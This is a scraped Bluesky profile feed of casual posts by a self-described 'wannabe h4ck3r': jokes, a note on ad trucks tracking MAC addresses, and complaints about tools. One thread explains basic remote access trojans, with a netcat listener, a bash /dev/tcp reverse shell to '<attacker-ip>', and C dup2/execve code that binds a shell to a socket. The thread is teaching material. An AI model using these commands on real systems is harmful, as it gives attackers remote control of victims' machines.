drop table users's Avatar

drop table users

@knownhost.bsky.social

wannabe h4ck3r | recurse center alum

66 Followers  |  120 Following  |  20 Posts  |  Joined: 10.10.2023  |  1.731

Latest posts by knownhost.bsky.social on Bluesky

radio hat

15.08.2025 15:43 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on I’m at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)

08.04.2025 19:26 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

TIL: Some delivery trucks that display ads aren’t actually making deliveries. Instead they are marketing campaigns that use WiFi beacons to track your device’s MAC address + location for targeting purposes. (1/2)

08.04.2025 19:25 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

spinach is a scam

21.01.2025 23:56 β€” πŸ‘ 4    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

So… if Canada becomes a US state, how many electoral votes does it get?

Will probably make it difficult for Republicans to retain the presidency, especially when Canadians all lose their healthcare.

09.01.2025 00:39 β€” πŸ‘ 298    πŸ” 29    πŸ’¬ 27    πŸ“Œ 4

@proton.me second major protonmail outage in a month and i missed the link to join an interview πŸ˜”

09.01.2025 16:20 β€” πŸ‘ 5    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

implement β€œquick access” and i’ll make the switch from 1pass

09.01.2025 16:17 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery

24.12.2024 18:54 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos

24.12.2024 18:53 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized

24.12.2024 18:36 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

systems design interview but it’s for santa’s delivery queue on xmas eve

24.12.2024 18:33 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0
The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form.

Top text:
I am not a toy
I am not a Christmas present
I am a 30+ years commitment

Bottom text:
Please think hard before you give someone
an Internet standard this Christmas

The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form. Top text: I am not a toy I am not a Christmas present I am a 30+ years commitment Bottom text: Please think hard before you give someone an Internet standard this Christmas

22.12.2024 14:06 β€” πŸ‘ 1123    πŸ” 219    πŸ’¬ 6    πŸ“Œ 3

TIL everything is a psyop

20.12.2024 17:08 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

spy kids (2001) was a cia psyop just check out cia.gov/spy-kids

20.12.2024 17:08 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

spotify wrapped is a cia psyop to reinforce the surveillance state πŸ€·β€β™‚οΈ

20.12.2024 17:06 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victims machine.

full write-up here: jackcarrick.net/blog/reverse...

15.12.2024 16:32 β€” πŸ‘ 2    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

because β€œeverything is a file” in unix systems you can do the same redirection with a networking socket

int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);

Then execute a shell
execve("/bin/sh", argv, NULL);

15.12.2024 16:32 β€” πŸ‘ 1    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo β€œfoo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

15.12.2024 16:32 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

upon connecting to the server an attacker can input commands into the victims shell as if it were their own more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

15.12.2024 16:32 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

curious how malware like remote access trojans (RATs) work? turns out you can create a very basic one with two commands:

attacker runs a TCP server:
nc -nlp 4444

victim connects to the server:
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

this is called a reverse shell

15.12.2024 16:32 β€” πŸ‘ 6    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo β€œfoo” > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

15.12.2024 15:45 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 0    πŸ“Œ 0

upon connecting to the server an attacker can input commands into the victims shell as if it were their own

more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

15.12.2024 15:45 β€” πŸ‘ 0    πŸ” 0    πŸ’¬ 1    πŸ“Œ 0

@knownhost is following 20 prominent accounts